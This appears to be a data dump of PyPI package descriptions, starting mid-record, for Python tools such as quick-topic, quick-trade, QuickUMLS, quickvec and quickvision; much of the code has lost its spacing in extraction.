filesstopwords_path=\"../datasets/stopwords/hit_stopwords.txt\"# set predefined topic labelslabel_names=['\u7ecf\u6d4e\u4e3b\u9898','\u80fd\u6e90\u4e3b\u9898','\u516c\u4f17\u4e3b\u9898','\u653f\u5e9c\u4e3b\u9898']# set keywords for each 
topictopic_economics=['\u6295\u8d44','\u878d\u8d44','\u7ecf\u6d4e','\u79df\u91d1','\u653f\u5e9c','\u5c31\u4e1a','\u5c97\u4f4d','\u5de5\u4f5c','\u804c\u4e1a','\u6280\u80fd']topic_energy=['\u7eff\u8272','\u6392\u653e','\u6c22\u80fd','\u751f\u7269\u80fd','\u5929\u7136\u6c14','\u98ce\u80fd','\u77f3\u6cb9','\u7164\u70ad','\u7535\u529b','\u80fd\u6e90','\u6d88\u8017','\u77ff\u4ea7','\u71c3\u6599','\u7535\u7f51','\u53d1\u7535']topic_people=['\u5065\u5eb7','\u7a7a\u6c14\u6c61\u67d3','\u5bb6\u5ead','\u80fd\u6e90\u652f\u51fa','\u884c\u4e3a','\u4ef7\u683c','\u7a7a\u6c14\u6392\u653e\u7269','\u6b7b\u4ea1','\u70f9\u996a','\u652f\u51fa','\u53ef\u518d\u751f','\u6db2\u5316\u77f3\u6cb9\u6c14','\u6c61\u67d3\u7269','\u56de\u6536','\u6536\u5165','\u516c\u6c11','\u6c11\u4f17']topic_government=['\u5b89\u5168','\u80fd\u6e90\u5b89\u5168','\u77f3\u6cb9\u5b89\u5168','\u5929\u7136\u6c14\u5b89\u5168','\u7535\u529b\u5b89\u5168','\u57fa\u7840\u8bbe\u65bd','\u96f6\u552e\u4e1a','\u56fd\u9645\u5408\u4f5c','\u7a0e\u6536','\u7535\u7f51','\u51fa\u53e3','\u8f93\u7535','\u7535\u7f51\u6269\u5efa','\u653f\u5e9c','\u89c4\u6a21\u7ecf\u6d4e']# a list of topics abovelist_topics=[topic_economics,topic_energy,topic_people,topic_government]# if any keyword is the below one, then the keyword is removed from our considerationfilter_words=['\u4e2d\u56fd','\u56fd\u5bb6','\u5de5\u4f5c','\u9886\u57df','\u793e\u4f1a','\u53d1\u5c55','\u76ee\u6807','\u5168\u56fd','\u65b9\u5f0f','\u6280\u672f','\u4ea7\u4e1a','\u5168\u7403','\u751f\u6d3b','\u884c\u52a8','\u670d\u52a1','\u541b\u8054','\u7814\u7a76','\u5229\u7528','\u610f\u89c1']# dictionarieslist_country=['\u5df4\u897f','\u5370\u5ea6','\u4fc4\u7f57\u65af','\u5357\u975e']# run shellrun_topic_interaction(meta_csv_file=meta_csv_file,raw_text_folder=text_root,output_folder=\"results/topic_interaction/divided\",list_category=list_country,# a dictionary where each record contain a group of keywordsstopwords_path=stopwords_path,weights_folder='results/topic_interaction/weights',list_keywords_path=list_keywords_path,label_names=label_names,list_topics=list_topics,filter_words=filter_words,# set field namestag_field=\"area\",keyword_field=\"\",# ignore if keyword from csv exists in the texttime_field=\"date\",id_field=\"fileId\",prefix_filename=\"text_\",)Example 3: Divide datasets by year or year-monthBy year:fromquick_topic.topic_transition.divide_by_yearimport*divide_by_year(meta_csv_file=\"../datasets/list_g20_news_all_clean.csv\",raw_text_folder=r\"datasets\\g20_news_processed\",output_folder=\"results/test1/divided_by_year\",start_year=2000,end_year=2021,)By year-month:fromquick_topic.topic_transition.divide_by_year_monthimport*divide_by_year_month(meta_csv_file=\"../datasets/list_g20_news_all_clean.csv\",raw_text_folder=r\"datasets\\g20_news_processed\",output_folder=\"results/test1/divided_by_year_month\",start_year=2000,end_year=2021)Example 4: Show topic transition by yearfromquick_topic.topic_transition.transition_by_year_month_topicimport*label=\"\u7ecf\u6d4e\"keywords=['\u6295\u8d44','\u878d\u8d44','\u7ecf\u6d4e','\u79df\u91d1','\u653f\u5e9c','\u5c31\u4e1a','\u5c97\u4f4d','\u5de5\u4f5c','\u804c\u4e1a','\u6280\u80fd']show_transition_by_year_month_topic(root_path=\"results/test1/divided_by_year_month\",label=label,keywords=keywords,start_year=2000,end_year=2021)Example 5: Show keyword-based topic transition by year-month for keywords in addition to mean 
linesfromquick_topic.topic_transition.transition_by_year_month_termimport*root_path=\"results/news_by_year_month\"select_keywords=['\u71c3\u7164','\u50a8\u80fd','\u7535\u52a8\u6c7d\u8f66','\u6c22\u80fd','\u8131\u78b3','\u98ce\u7535','\u6c34\u7535','\u5929\u7136\u6c14','\u5149\u4f0f','\u53ef\u518d\u751f','\u6e05\u6d01\u80fd\u6e90','\u6838\u7535']list_all_range=[[[2010,2015],[2016,2021]],[[2011,2017],[2018,2021]],[[2009,2017],[2018,2021]],[[2011,2016],[2017,2021]],[[2017,2018],[2019,2021]],[[2009,2014],[2015,2021]],[[2009,2014],[2015,2021]],[[2009,2015],[2016,2021]],[[2008,2011],[2012,2015],[2016,2021]],[[2011,2016],[2017,2021]],[[2009,2012],[2013,2016],[2017,2021]],[[2009,2015],[2016,2021]]]output_figure_folder=\"results/figures\"show_transition_by_year_month_term(root_path=\"results/test1/divided_by_year_month\",select_keywords=select_keywords,list_all_range=list_all_range,output_figure_folder=output_figure_folder,start_year=2000,end_year=2021)Example 6: Get time trends of numbers of documents containing topic keywords with full text.fromquick_topic.topic_trends.trends_by_year_month_fulltextimport*# define a group of topics with keywords, each topic has a labellabel_names=['\u7ecf\u6d4e','\u80fd\u6e90','\u516c\u6c11','\u653f\u5e9c']keywords_economics=['\u6295\u8d44','\u878d\u8d44','\u7ecf\u6d4e','\u79df\u91d1','\u653f\u5e9c','\u5c31\u4e1a','\u5c97\u4f4d','\u5de5\u4f5c','\u804c\u4e1a','\u6280\u80fd']keywords_energy=['\u7eff\u8272','\u6392\u653e','\u6c22\u80fd','\u751f\u7269\u80fd','\u5929\u7136\u6c14','\u98ce\u80fd','\u77f3\u6cb9','\u7164\u70ad','\u7535\u529b','\u80fd\u6e90','\u6d88\u8017','\u77ff\u4ea7','\u71c3\u6599','\u7535\u7f51','\u53d1\u7535']keywords_people=['\u5065\u5eb7','\u7a7a\u6c14\u6c61\u67d3','\u5bb6\u5ead','\u80fd\u6e90\u652f\u51fa','\u884c\u4e3a','\u4ef7\u683c','\u7a7a\u6c14\u6392\u653e\u7269','\u6b7b\u4ea1','\u70f9\u996a','\u652f\u51fa','\u53ef\u518d\u751f','\u6db2\u5316\u77f3\u6cb9\u6c14','\u6c61\u67d3\u7269','\u56de\u6536','\u6536\u5165','\u516c\u6c11','\u6c11\u4f17']keywords_government=['\u5b89\u5168','\u80fd\u6e90\u5b89\u5168','\u77f3\u6cb9\u5b89\u5168','\u5929\u7136\u6c14\u5b89\u5168','\u7535\u529b\u5b89\u5168','\u57fa\u7840\u8bbe\u65bd','\u96f6\u552e\u4e1a','\u56fd\u9645\u5408\u4f5c','\u7a0e\u6536','\u7535\u7f51','\u51fa\u53e3','\u8f93\u7535','\u7535\u7f51\u6269\u5efa','\u653f\u5e9c','\u89c4\u6a21\u7ecf\u6d4e']list_topics=[keywords_economics,keywords_energy,keywords_people,keywords_government]# call function to show trends of number of documents containing topic keywords each year-monthshow_year_month_trends_with_fulltext(meta_csv_file=\"datasets/list_country.csv\",list_topics=list_topics,label_names=label_names,save_result_path=\"results/topic_trends/trends_fulltext.csv\",minimum_year=2010,raw_text_path=r\"datasets/raw_text\",id_field='fileId',time_field='date',prefix_filename=\"text_\")Example 7: Estimate the correlation between two 
trendsfromquick_topic.topic_trends_correlation.topic_trends_correlation_twoimport*trends_file=\"results/topic_trends/trends_fulltext.csv\"label_names=['\u7ecf\u6d4e','\u80fd\u6e90','\u516c\u6c11','\u653f\u5e9c']list_result=[]list_line=[]foriinrange(0,len(label_names)-1):forjinrange(i+1,len(label_names)):label1=label_names[i]label2=label_names[j]result=estimate_topic_trends_correlation_single_file(trend_file=trends_file,selected_field1=label1,selected_field2=label2,start_year=2010,end_year=2021,show_figure=False,time_field='Time')list_result=[]line=f\"({label1},{label2})\\t{result['pearson'][0]}\\t{result['pearson'][1]}\"list_line.append(line)print()print(\"Correlation analysis resutls:\")print(\"Pair\\tPearson-Stat\\tP-value\")forlineinlist_line:print(line)Example 8: Estimate topic similarity between two groups of LDA topicsfromquick_topic.topic_modeling.ldaimportbuild_lda_modelsfromquick_topic.topic_similarity.topic_similarity_by_categoryimport*# Step 1: build topic modelsmeta_csv_file=\"datasets/list_country.csv\"raw_text_folder=\"datasets/raw_text\"list_term_file=[\"../datasets/keywords/countries.csv\",\"../datasets/keywords/leaders_unique_names.csv\",\"../datasets/keywords/carbon2.csv\"]stop_words_path=\"../datasets/stopwords/hit_stopwords.txt\"list_category=build_lda_models(meta_csv_file=meta_csv_file,raw_text_folder=raw_text_folder,output_folder=\"results/topic_similarity_two/topics\",list_term_file=list_term_file,stopwords_path=stop_words_path,prefix_filename=\"text_\",num_topics=6,num_words=50)# Step 2: estimate similarityoutput_folder=\"results/topic_similarity_two/topics\"keywords_file=\"../datasets/keywords/carbon2.csv\"estimate_topic_similarity(list_topic=list_category,topic_folder=output_folder,list_keywords_file=keywords_file,)Example 9: Stat sentence numbers by keywordsfromquick_topic.topic_stat.stat_by_keywordimport*meta_csv_file='datasets/list_country.csv'raw_text_folder=\"datasets/raw_text\"keywords_energy=['\u7164\u70ad','\u5929\u7136\u6c14','\u77f3\u6cb9','\u751f\u7269','\u592a\u9633\u80fd','\u98ce\u80fd','\u6c22\u80fd','\u6c34\u529b','\u6838\u80fd']stat_sentence_by_keywords(meta_csv_file=meta_csv_file,keywords=keywords_energy,id_field=\"fileId\",raw_text_folder=raw_text_folder,contains_keyword_in_sentence='',prefix_file_name='text_')Example 9: English topic modelingfromquick_topic.topic_visualization.topic_modeling_pipelineimport*## datameta_csv_file=\"datasets_en/list_blog_meta.csv\"raw_text_folder=f\"datasets_en/raw_text\"stopwords_path=\"\"## parameterschinese_font_file=\"\"num_topics=8num_words=20n_rows=2n_cols=4max_records=-1## outputresult_output_folder=f\"results/en_topic{num_topics}\"ifnotos.path.exists(result_output_folder):os.mkdir(result_output_folder)run_topic_modeling_pipeline(meta_csv_file=meta_csv_file,raw_text_folder=raw_text_folder,stopwords_path=stopwords_path,top_record_num=max_records,chinese_font_file=\"\",num_topics=num_topics,num_words=num_words,n_rows=n_rows,n_cols=n_cols,result_output_folder=result_output_folder,load_existing_models=False,lang='en',prefix_filename='')LicenseThequick-topictoolkit is provided byDonghua Chenwith MIT License."} +{"package": "quick-torch", "pacakge-description": "Quick, Torch!Quick, Torch! is a simple package that provides a\"Quick, Draw!\"dataset using the abstract classVisionDataset, provided bytorchvisionAPI. 
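Because it follows the torchvision VisionDataset interface, the dataset drops straight into the usual torch.utils.data tooling; a sketch assuming the same constructor arguments as the usage example that follows (the batch size and transform pipeline are arbitrary choices, not part of the package's documentation):
from torch.utils.data import DataLoader
import torchvision.transforms as T
from quick_torch import QuickDraw

ds = QuickDraw(
    root="dataset",
    categories="face",
    download=True,
    transform=T.Compose([T.Resize((28, 28)), T.ToTensor()]),
)
loader = DataLoader(ds, batch_size=64, shuffle=True)
images, labels = next(iter(loader))  # one batch of drawings and their category labels
print(images.shape)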
This package mirrors theMNISTdataset provided in torchvision.You can install this package withpip install quick-torch --upgradeExampleHere are a simple example of usage:fromquick_torchimportQuickDrawimporttorchvision.transformsasTds=QuickDraw(root=\"dataset\",categories=\"face\",download=True,transform=T.Resize((128,128)))print(f\"{len(ds)= }\")first_data=ds[0]first_data>>>Downloadinghttps://storage.googleapis.com/quickdraw_dataset/full/numpy_bitmap/face.npy>>>>>>len(ds)=161666>>>(,108)For more examples, please refer to the notebookexample.ipynbReferencesThis work was mainly inspired by the following repositories:MNIST from torchvisionThe dataset of this notebook"} +{"package": "quicktracer", "pacakge-description": "# Quicktrace\n## Call trace and see what your program is up to.# Demo: Trace some dummy dataimportmathimporttimefromquicktracerimporttraceforiinrange(2000):trace(30*math.sin(i/30))trace(.3*math.cos(i/20))time.sleep(0.002)"} +{"package": "quicktrack", "pacakge-description": "No description available on PyPI."} +{"package": "quick-trade", "pacakge-description": "quick_tradeDependencies:\n \u251c\u2500\u2500ta (Bukosabino https://github.com/bukosabino/ta (by Dar\u00edo L\u00f3pez Padial))\n \u251c\u2500\u2500plotly (https://github.com/plotly/plotly.py)\n \u251c\u2500\u2500pandas (https://github.com/pandas-dev/pandas)\n \u251c\u2500\u2500numpy (https://github.com/numpy/numpy)\n \u251c\u2500\u2500tqdm (https://github.com/tqdm/tqdm)\n \u251c\u2500\u2500scikit-learn (https://github.com/scikit-learn/scikit-learn)\n \u2514\u2500\u2500ccxt (https://github.com/ccxt/ccxt)Documentation:\ud83d\udea7https://quick-trade.github.io/quick_trade/#/\ud83d\udea7Twitter:@quick_trade_twDiscord:quick_tradeInstallation:Quick install:$ pip3 install quick-tradeFor development:$ git clone https://github.com/quick-trade/quick_trade.git\n$ pip3 install -r quick_trade/requirements.txt\n$ cd quick_trade\n$ python3 setup.py install\n$ cd ..Customize your strategy!fromquick_trade.plotsimportTraderGraph,make_trader_figureimportccxtfromquick_tradeimportstrategy,TradingClient,Traderfromquick_trade.utilsimportTradeSideclassMyTrader(qtr.Trader):@strategydefstrategy_sell_and_hold(self):ret=[]foriinself.df['Close'].values:ret.append(TradeSide.SELL)self.returns=retself.set_credit_leverages(2)# if you want to use a leverageself.set_open_stop_and_take(stop)# or... 
set a stop loss with only one line of codereturnretclient=TradingClient(ccxt.binance())df=client.get_data_historical(\"BTC/USDT\")trader=MyTrader(\"BTC/USDT\",df=df)trader.connect_graph(TraderGraph(make_trader_figure()))trader.set_client(client)trader.strategy_sell_and_hold()trader.backtest()Find the best strategy!importquick_tradeasqtrimportccxtfromquick_trade.tunerimport*fromquick_tradeimportTradingClientclassTest(qtr.ExampleStrategies):@strategydefstrategy_supertrend1(self,plot:bool=False,*st_args,**st_kwargs):self.strategy_supertrend(plot=plot,*st_args,**st_kwargs)self.convert_signal()# only long tradesreturnself.returns@strategydefmacd(self,histogram=False,**kwargs):ifnothistogram:self.strategy_macd(**kwargs)else:self.strategy_macd_histogram_diff(**kwargs)self.convert_signal()returnself.returns@strategydefpsar(self,**kwargs):self.strategy_parabolic_SAR(plot=False,**kwargs)self.convert_signal()returnself.returnsparams={'strategy_supertrend1':[{'multiplier':Linspace(0.5,22,5)}],'macd':[{'slow':Linspace(10,100,3),'fast':Linspace(3,60,3),'histogram':Choise([False,True])}],'psar':[{'step':0.01,'max_step':0.1},{'step':0.02,'max_step':0.2}]}tuner=QuickTradeTuner(TradingClient(ccxt.binance()),['BTC/USDT','OMG/USDT','XRP/USDT'],['15m','5m'],[1000,700,800,500],params)tuner.tune(Test)print(tuner.sort_tunes())tuner.save_tunes('quick-trade-tunes.json')# save tunes as JSONYou can also set rules for arranging arguments for each strategy by using_RULES_andkwargsto access the values of the arguments:params={'strategy_3_sma':[dict(plot=False,slow=Choise([2,3,5,8,13,21,34,55,89,144,233,377,610,987,1597]),fast=Choise([2,3,5,8,13,21,34,55,89,144,233,377,610,987,1597]),mid=Choise([2,3,5,8,13,21,34,55,89,144,233,377,610,987,1597]),_RULES_='kwargs[\"slow\"] > kwargs[\"mid\"] > kwargs[\"fast\"]')],}User's code example (backtest)fromquick_tradeimportbrokersfromquick_tradeimporttrading_sysasqtrfromquick_trade.plotsimport*importccxtfromnumpyimportinfclient=brokers.TradingClient(ccxt.binance())df=client.get_data_historical('BTC/USDT','15m',1000)trader=qtr.ExampleStrategies('BTC/USDT',df=df,interval='15m')trader.set_client(client)trader.connect_graph(TraderGraph(make_trader_figure(height=731,width=1440,row_heights=[10,5,2])))trader.strategy_2_sma(55,21)trader.backtest(deposit=1000,commission=0.075,bet=inf)# backtest on one pairOutput plotly chart:Output printlosses: 12\ntrades: 20\nprofits: 8\nmean year percentage profit: 215.1878652911773%\nwinrate: 40.0%\nmean deviation: 2.917382949881604%\nSharpe ratio: 0.02203412259055281\nSortino ratio: 0.02774402450236864\ncalmar ratio: 21.321078596349782\nmax drawdown: 10.092728860725552%Run strategyUse the strategy on real moneys. 
YES, IT'S FULLY AUTOMATED!importdatetimefromquick_trade.trading_sysimportExampleStrategiesfromquick_trade.brokersimportTradingClientfromquick_trade.plotsimportTraderGraph,make_figureimportccxtticker='MATIC/USDT'start_time=datetime.datetime(2021,# year6,# month24,# day5,# hour16,# minute57)# second (Leave a few seconds to download data from the exchange)classMyTrade(ExampleStrategies):@strategydefstrategy(self):self.strategy_supertrend(multiplier=2,length=1,plot=False)self.convert_signal()self.set_credit_leverages(1)self.sl_tp_adder(10)returnself.returnskeys={'apiKey':'your api key','secret':'your secret key'}client=TradingClient(ccxt.binance(config=keys))# or any other exchangetrader=MyTrade(ticker=ticker,interval='1m',df=client.get_data_historical(ticker,limit=10))fig=make_trader_figure()graph=TraderGraph(figure=fig)trader.connect_graph(graph)trader.set_client(client)trader.realtime_trading(strategy=trader.strategy,start_time=start_time,ticker=ticker,limit=100,wait_sl_tp_checking=5)Additional ResourcesOld documentation (V3 doc):https://vladkochetov007.github.io/quick_trade.github.ioLicensequick_tradebyVladyslav Kochetovis licensed under aCreative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.Permissions beyond the scope of this license may be available atvladyslavdrrragonkoch@gmail.com."} +{"package": "quicktranslate", "pacakge-description": "you can use this in the command line,this is a example:trans -t exampleor:trans --trans example\u2018example\u2019 means what you want to translate"} +{"package": "quicktrash", "pacakge-description": "ExampleCommand:python3 -m quicktrash file0.txt file1.pdf folderOutput:/home/user/.quicktrash/0x2/home/user/Documents/file0.txt\n/home/user/.quicktrash/0x2/home/user/Documents/file1.pdf\n/home/user/.quicktrash/0x2/home/user/Documents/folderPython ExamplesUsing context:importquicktrashwithquicktrash.Trash(\"example-trashdir\")astrash:trash.recycle(\"example-file.txt\")Using next()importquicktrashtr=quicktrash.Trash(\"example-trashdir\")trlet:quicktrash.Trashlet=next(tr)trlet.recycle(\"example-file.txt\")"} +{"package": "quickui", "pacakge-description": "QuickUITable of ContentsInstallationLicenseInstallationpip install quickuiLicensequickuiis distributed under the terms of theMITlicense."} +{"package": "quickumls", "pacakge-description": "NEW: v.1.4 supports starting multiple QuickUMLS matchers concurrently!I've finally added support forunqliteas an alternative to leveldb for storage of CUIs and Semantic Types (seeherefor more details). unqlite-backed QuickUMLS installation support multiple matchers running at the same time. Other than better multi-processing support, unqlite should have better support for unicode.QuickUMLSQuickUMLS (Soldaini and Goharian, 2016) is a tool for fast, unsupervised biomedical concept extraction from medical text.\nIt takes advantage ofSimstring(Okazaki and Tsujii, 2010) for approximate string matching.\nFor more details on how QuickUMLS works, we remand to our paper.This project should be compatible with Python 3 (Python 2 isno longer supported) and run on any UNIX system (support for Windows is experimental, please report bugs!).If you find any bugs, please file an issue on GitHub or email the author atluca@ir.cs.georgetown.edu.InstallationObtain a UMLS installationThis tool requires you to have a valid UMLS installation on disk. 
To install UMLS, you must first obtain alicensefrom the National Library of Medicine; then you should download all UMLS files fromthis page; finally, you can install UMLS using theMetamorphoSystool asexplained in this guide. The installation can be removed once the system has been initialized.Install QuickUMLS: You can do so by either runningpip install quickumlsorpython setup.py install. On macOS, using anaconda isstrongly recommended\u2020.Create a QuickUMLS installationInitialize the system by runningpython -m quickumls.install , whereis where the installation files are (in particular, we needMRCONSO.RRFandMRSTY.RRF) andis the directory where the QuickUmls data files should be installed. This process will take between 5 and 30 minutes depending how fast the CPU and the drive where UMLS and QuickUMLS files are stored are (on a system with a Intel i7 6700K CPU and a 7200 RPM hard drive, initialization takes 8.5 minutes).python -m quickumls.installsupports the following optional arguments:-L/--lowercase: if used, all concept terms are folded to lowercase before being processed. This option typically increases recall, but it might reduce precision;-U/--normalize-unicode: if used, expressions with non-ASCII characters are converted to the closest combination of ASCII characters.-E/--language: Specify the language to consider for UMLS concepts; by default, English is used. For a complete list of languages, please seethis table provided by NLM.-d/--database-backend: Specify which database backend to use for QuickUMLS. The two options areleveldbandunqlite. The latter supports multi-process reading and has better unicode compatibility, and it used as default for all new 1.4 installations; the former is still used as default when instantiating a QuickUMLS client. More info about differences between the two databases and migration info are availablehere.\u2020: If the installation fails on macOS when using Anaconda, installleveldbfirst by runningconda install -c conda-forge python-leveldb.APIsA QuickUMLS object can be instantiated as follows:fromquickumlsimportQuickUMLSmatcher=QuickUMLS(quickumls_fp,overlapping_criteria,threshold,similarity_name,window,accepted_semtypes)Where:quickumls_fpis the directory where the QuickUMLS data files are installed.overlapping_criteria(optional, default: \"score\") is the criteria used to deal with overlapping concepts; choose \"score\" if the matching score of the concepts should be consider first, \"length\" if the longest should be considered first instead.threshold(optional, default: 0.7) is the minimum similarity value between strings.similarity_name(optional, default: \"jaccard\") is the name of similarity to use. Choose between \"dice\", \"jaccard\", \"cosine\", or \"overlap\".window(optional, default: 5) is the maximum number of tokens to consider for matching.accepted_semtypes(optional, default: seeconstants.py) is the set of UMLS semantic types concepts should belong to. Semantic types are identified by the letter \"T\" followed by three numbers (e.g., \"T131\", which identifies the type\"Hazardous or Poisonous Substance\"). 
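The note above about unqlite-backed installations supporting multiple matchers running at the same time can be illustrated with a small multiprocessing sketch. This is only an illustration under assumptions not stated in the README: the QuickUMLS data is assumed to live at ./quickumls_install (created with -d unqlite), and only the QuickUMLS constructor and match() call shown in the APIs section below are taken from the documented interface.

```python
# Hedged sketch (not from the QuickUMLS docs): several worker processes, each
# holding its own matcher, reading the same unqlite-backed installation.
from multiprocessing import Pool

from quickumls import QuickUMLS

QUICKUMLS_PATH = "./quickumls_install"  # hypothetical installation directory
_matcher = None

def _init_worker():
    # Build one matcher per worker process; the unqlite backend supports multi-process reading.
    global _matcher
    _matcher = QuickUMLS(QUICKUMLS_PATH, threshold=0.7)

def extract(text):
    return _matcher.match(text, best_match=True, ignore_syntax=False)

if __name__ == "__main__":
    notes = [
        "The ulna has dislocated posteriorly from the trochlea of the humerus.",
        "Patient reports shortness of breath and chest pain.",
    ]
    with Pool(processes=2, initializer=_init_worker) as pool:
        for concepts in pool.map(extract, notes):
            print(concepts)
```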
Seeherefor the full list.To use the matcher, simply calltext=\"The ulna has dislocated posteriorly from the trochlea of the humerus.\"matcher.match(text,best_match=True,ignore_syntax=False)Setbest_matchtoFalseif you want to return overlapping candidates,ignore_syntaxtoTrueto disable all heuristics introduced in (Soldaini and Goharian, 2016).If the matcher throws a warning during initialization, readthis pageto learn why and how to stop it from doing so.spaCy pipeline componentQuickUMLS can be used for standalone processing but it can also be use as a component in a modular spaCy pipeline. This follows traditional spaCy handling of concepts to be entity objects added to the Document object. These entity objects contain the CUI, similarity score and Semantic Types in the spacy \"underscore\" object.Adding QuickUMLS as a component in a pipeline can be done as follows:fromquickumls.spacy_componentimportSpacyQuickUMLS# common English pipelinenlp=spacy.load('en_core_web_sm')quickumls_component=SpacyQuickUMLS(nlp,'PATH_TO_QUICKUMLS_DATA')nlp.add_pipe(quickumls_component)doc=nlp('Pt c/o shortness of breath, chest pain, nausea, vomiting, diarrrhea')forentindoc.ents:print('Entity text :{}'.format(ent.text))print('Label (UMLS CUI) :{}'.format(ent.label_))print('Similarity :{}'.format(ent._.similarity))print('Semtypes :{}'.format(ent._.semtypes))Server / Client SupportStarting with v.1.2, QuickUMLS includes a support for being used in a client-server configuration. That is, you can start one QuickUMLS server, and query it from multiple scripts using a client.To start the server, runpython -m quickumls.server:python-mquickumls.server/path/to/quickumls/files{-PQuickUMLSport}{-HQuickUMLShost}{QuickUMLSoptions}Host and port are optional; by default, QuickUMLS runs onlocalhost:4645. You can also pass any QuickUMLS option mentioned above to the server. To obtain a list of options for the server, runpython -m quickumls.server -h.To load the client, importget_quickumls_clientfromquickumls:fromquickumlsimportget_quickumls_clientmatcher=get_quickumls_client()text=\"The ulna has dislocated posteriorly from the trochlea of the humerus.\"matcher.match(text,best_match=True,ignore_syntax=False)The API of the client is the same of a QuickUMLS object.In case you wish to run the server in the background, you can do so as follows:nohuppython-mquickumls.server/path/to/QuickUMLS{serveroptions}>/dev/null2>&1&echo$!>nohup.pidWhen you are done, don't forget to stop the server by running.kill-9`catnohup.pid`rmnohup.pidReferencesOkazaki, Naoaki, and Jun'ichi Tsujii. \"Simple and efficient algorithm for approximate dictionary matching.\" COLING 2010.Luca Soldaini and Nazli Goharian. \"QuickUMLS: a fast, unsupervised approach for medical concept extraction.\" MedIR Workshop, SIGIR 2016."} +{"package": "quickumls-simstring", "pacakge-description": "Orginal version bychokkan, availablehere. New version (compiles\nunder macOS) fromhere.Windows/Anaconda/VisualStudio specific steps:Make sure that iconv is available to your desired conda environment:conda install-cconda-forgelibiconvThen, open a Visual Studio Developer Prompt (e.g. \u201cVS 2015 x64\nDeveloper Command Prompt\u201d or \u201cVS 2015 x86 Developer Command Prompt\u201d)Now you can any of these commands to build or install:pythonsetup.pybuildpythonsetup.pyinstallNOTE: If there is a failure that \u2018rc.exe\u2019 cannot be found, add\nthe appropriate WindowKits binary path to PATH. 
More info on thishere."} +{"package": "quickunit", "pacakge-description": "Given standard test setup, will determine which tests need to run against a given diff.For example, say you\u2019re working in your branch called my-new-sexy-feature, which modifies the following files:src/foo/bar/__init__.py\nsrc/foo/bar/baz.py\nsrc/foo/biz.pyIf you\u2019re using a traditional test layout, we\u2019ll automatically add the following rule for you:tests/{path}/test_{filename}Otherwise you can add rules using regular expression syntax in combination with the path and filename formatters.Now if we run with the default options,nosetests--with-quickunit, it will look for tests (by default) in\nthe following base directories:tests/src/foo/bar/test_baz.py\ntests/src/foo/test_biz.py(It does this by analyzing the diff against master, and determining which files you\u2019ve changed\nare tests, including them, and which files containing test coverage in a parallel directory.)ConfigIf you want to support multiple directories for searching (let\u2019s say you break up unittests from integration tests)\nyou can do that as well:::\u2013quickunit-rule=tests/{path}/test_{filename} \u2013quickunit-rule=tests/{path}/{basename}/tests.pyOr, if you\u2019d prefer, viasetup.cfg:quickunit-rule = tests/{path}/test_{filename}\n tests/{path}/{basename}/tests.pyRulesRules are a combination of simple formatting a regular expressions.The following formatted variables are available within a rule:{path}The base path of the filename (e.g. foo/bar){filename}The filename excluding the path (e.g. baz.py){basename}The filename excluding the extension (e.g. baz)A rule is first formatted (using.format(params)) and then compiled into a regular expression on top of each changed file."} +{"package": "quickutil", "pacakge-description": "quickutilQuick and easy access to python functionsInstallationView on PyPihttps://pypi.org/project/quickutil/Install on Windowspy -m pip install quickutilInstall on Unix/macOSpython3 -m pip install quickutil"} +{"package": "quickutil4py", "pacakge-description": "No description available on PyPI."} +{"package": "quick-vcn", "pacakge-description": "Set up an OCI VCN and components quicklyTo install:pip install -e .To use:quick-vcn --profile YOUR-PROFILE \\\n --compartment YOUR-COMPARTMENT-NAME \\\n --region uk-london-1 \\\n [ --vcn-name \"net\" ] \\\n [ --vcn-cidr 10.0.0.0/16 ] \\\n [ --subnet-name \"sub\" ] \\\n [ --subnet-cidr 10.0.0.0/24 ]"} +{"package": "quickvec", "pacakge-description": "QuickVecQuickVec is a simple package to make it easy to work with word embeddings.\nQuickVec supports instantaneous loading of word embeddings after converting\nthem to a native SQLite format. QuickVec is designed to do exactly one thing\nwell: allow you to quickly load word embeddings and look up the vectors for\nwords.Installationpip install quickvec(requires Python 3.6+)Design philosophyQuickVec was created to supportNERPy,\na named entity recognition framework that uses word embeddings for feature\ngeneration. NERPy originally used gensim, but the time and memory required to\nload a word embedding completely into memory was a large performance\nbottleneck. 
NERPy then turned to Magnitude, but its conversion process is quite\nslow, and its installation process caused problems for NERPy users.\nThe NERPy developers created QuickVec based on the design of Magnitude,\nbut with the goal of creating a package with minimal features and dependencies.FAQHow does QuickVec compare togensim'sKeyedVectorsfor loading word embeddings?QuickVec can load word embeddings instantaneously after conversion to its\nnative SQLite-based format, and does not load the whole embedding into memory,\nmaking it more memory efficient. However, QuickVec only supports text-format\nword embeddings files, and in general has far less functionality.How does QuickVec compare toMagnitudefor loading word embeddings?Like Magnitude, QuickVec can instantly load word embeddings after conversion\nto its native SQLite-based format. QuickVec's conversion process is faster\nthan Magnitude's. However, QuickVec does not support many of Magnitude's\nfeatures, such as word similarity or generating vectors for out-of-vocabulary\nwords, and QuickVec does not provide pre-converted word embeddings and only\nsupports loading from text-format embeddings."} +{"package": "quickverifyimg", "pacakge-description": "No description available on PyPI."} +{"package": "quickvision", "pacakge-description": "QuickvisionFaster Computer Vision.Install QuickvisionInstall from PyPi.Current stablerelease 0.1.1needsPyTorch 1.7.1andtorchvision 0.8.2.pip install quickvisionWhat is Quickvision?Quickvision makes Computer Vision tasks much faster and easier with PyTorch.It provides: -Easy to use PyTorch native API, forfit(),train_step(),val_step()of models.Easily customizable and configurable models with various backbones.A complete PyTorch native interface. All models arenn.Module, all the training APIs are optional and not binded to models.A lightning API which helps to accelerate training over multiple GPUs, TPUs.A datasets API to convert common data formats very easily and quickly to PyTorch formats.A minimal package, with very low dependencies.Train your models faster. Quickvision has already implemented the long learning in PyTorch.Quickvision is just PyTorch!!Quickvision does not make you learn a new library. If you know PyTorch, you are good to go!!!Quickvision does not abstract any code from PyTorch, nor implements any custom classes over it.It keeps the data format inTensorso that you don't need to convert it.Do you want just a model with some backbone configuration?Use model made by us. It's just ann.Modulewhich has Tensors only Input and Output format.Quickvision provides reference scripts too for training it!Do you want to train your model but not write lengthy loops?Just use our training methods such asfit(),train_step(),val_step().Do you want multi GPU training but worried about model configuration?Just subclass the PyTorch Lightning model!Implement thetrain_step(),val_step()."} +{"package": "quickviz", "pacakge-description": "Widgets for quickly visualizing pandas dataframesIt is often necessary to plot data in order to understand it. Plotting\nallows to quiclky spot glitches in the data: that person who is 180 meters\ntall or this car which can speed thousands of kilometers per hour will\nimmediately stand out. In this situation, one wants a way to quickly\n(rather than beautifully) plot their data. 
